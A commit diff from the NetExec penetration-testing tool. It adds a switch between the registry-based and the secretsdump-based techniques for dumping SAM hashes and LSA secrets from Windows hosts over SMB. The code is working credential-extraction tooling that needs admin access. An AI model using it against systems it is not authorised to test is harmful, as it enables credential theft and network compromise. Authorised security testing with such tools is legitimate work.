Add choice to use old or new technique

Author: mpgn

nxc/protocols/smb.py

@@ -9,12 +9,14 @@
 from impacket.smb import SMB_DIALECT
 from impacket.examples.secretsdump import (
     RemoteOperations,
+    SAMHashes,
+    LSASecrets,
     NTDSHashes,
 )
 from impacket.examples.regsecrets import (
     RemoteOperations as RegSecretsRemoteOperations,
-    SAMHashes,
-    LSASecrets
+    SAMHashes as RegSecretsSAMHashes,
+    LSASecrets as RegSecretsLSASecrets
 )
 from impacket.nmb import NetBIOSError, NetBIOSTimeout
 from impacket.dcerpc.v5 import transport, lsat, lsad, scmr, rrp, srvs, wkst
@@ -1550,7 +1552,7 @@ def enable_remoteops(self, regsecret=False):
     @requires_admin
     def sam(self):
         try:
-            self.enable_remoteops(regsecret=True)
+            self.enable_remoteops(regsecret=True if self.args.sam == "regdump" else False)
             host_id = self.db.get_hosts(filter_term=self.host)[0][0]
 
             def add_sam_hash(sam_hash, host_id):
@@ -1568,11 +1570,20 @@ def add_sam_hash(sam_hash, host_id):
             add_sam_hash.sam_hashes = 0
 
             if self.remote_ops and self.bootkey:
-                SAM = SAMHashes(
-                    self.bootkey,
-                    remoteOps=self.remote_ops,
-                    perSecretCallback=lambda secret: add_sam_hash(secret, host_id),
-                )
+                if self.args.sam == "regdump":
+                    SAM = RegSecretsSAMHashes(
+                        self.bootkey,
+                        remoteOps=self.remote_ops,
+                        perSecretCallback=lambda secret: add_sam_hash(secret, host_id),
+                    )
+                else:
+                    SAM_file_name = self.remote_ops.saveSAM()
+                    SAM = SAMHashes(
+                        SAM_file_name,
+                        self.bootkey,
+                        isRemote=True,
+                        perSecretCallback=lambda secret: add_sam_hash(secret, host_id),
+                    )
 
                 self.logger.display("Dumping SAM hashes")
                 SAM.dump()
@@ -1583,6 +1594,9 @@ def add_sam_hash(sam_hash, host_id):
                     self.remote_ops.finish()
                 except Exception as e:
                     self.logger.debug(f"Error calling remote_ops.finish(): {e}")
+
+                if self.args.sam == "secdump":
+                    SAM.finish()
         except SessionError as e:
             if "STATUS_ACCESS_DENIED" in e.getErrorString():
                 self.logger.fail('Error "STATUS_ACCESS_DENIED" while dumping SAM. This is likely due to an endpoint protection.')
@@ -1799,7 +1813,7 @@ def firefox_callback(secret):
     @requires_admin
     def lsa(self):
         try:
-            self.enable_remoteops(regsecret=True)
+            self.enable_remoteops(regsecret=True if self.args.lsa == "regdump" else False)
 
             def add_lsa_secret(secret):
                 add_lsa_secret.secrets += 1
@@ -1818,11 +1832,20 @@ def add_lsa_secret(secret):
             add_lsa_secret.secrets = 0
 
             if self.remote_ops and self.bootkey:
-                LSA = LSASecrets(
-                    self.bootkey,
-                    self.remote_ops,
-                    perSecretCallback=lambda secret_type, secret: add_lsa_secret(secret),
-                )
+                if self.args.lsa == "regdump":
+                    LSA = RegSecretsLSASecrets(
+                        self.bootkey,
+                        self.remote_ops,
+                        perSecretCallback=lambda secret_type, secret: add_lsa_secret(secret),
+                    )
+                else:
+                    SECURITYFileName = self.remote_ops.saveSECURITY()
+                    LSA = LSASecrets(
+                        SECURITYFileName,
+                        self.bootkey,
+                        isRemote=True,
+                        perSecretCallback=lambda secret_type, secret: add_lsa_secret(secret),
+                    )
                 self.logger.success("Dumping LSA secrets")
                 LSA.dumpCachedHashes()
                 LSA.exportCached(self.output_filename)
@@ -1833,6 +1856,8 @@ def add_lsa_secret(secret):
                     self.remote_ops.finish()
                 except Exception as e:
                     self.logger.debug(f"Error calling remote_ops.finish(): {e}")
+                if self.args.lsa == "secdump":
+                    LSA.finish()
         except SessionError as e:
             if "STATUS_ACCESS_DENIED" in e.getErrorString():
                 self.logger.fail('Error "STATUS_ACCESS_DENIED" while dumping LSA. This is likely due to an endpoint protection.')

nxc/protocols/smb/proto_args.py

@@ -25,8 +25,8 @@ def proto_args(parser, parents):
     self_delegate_arg.make_required = [delegate_arg]
 
     cred_gathering_group = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
-    cred_gathering_group.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
-    cred_gathering_group.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
+    cred_gathering_group.add_argument("--sam", choices={"regdump", "secdump"}, nargs="?", const="regdump", help="dump SAM hashes from target systems")
+    cred_gathering_group.add_argument("--lsa", choices={"regdump", "secdump"}, nargs="?", const="regdump", help="dump LSA secrets from target systems")
     cred_gathering_group.add_argument("--ntds", choices={"vss", "drsuapi"}, nargs="?", const="drsuapi", help="dump the NTDS.dit from target DCs using the specifed method")
     cred_gathering_group.add_argument("--dpapi", choices={"cookies", "nosystem"}, nargs="*", help="dump DPAPI secrets from target systems, can dump cookies if you add 'cookies', will not dump SYSTEM dpapi if you add nosystem")
     cred_gathering_group.add_argument("--sccm", choices={"wmi", "disk"}, nargs="?", const="disk", help="dump SCCM secrets from target systems")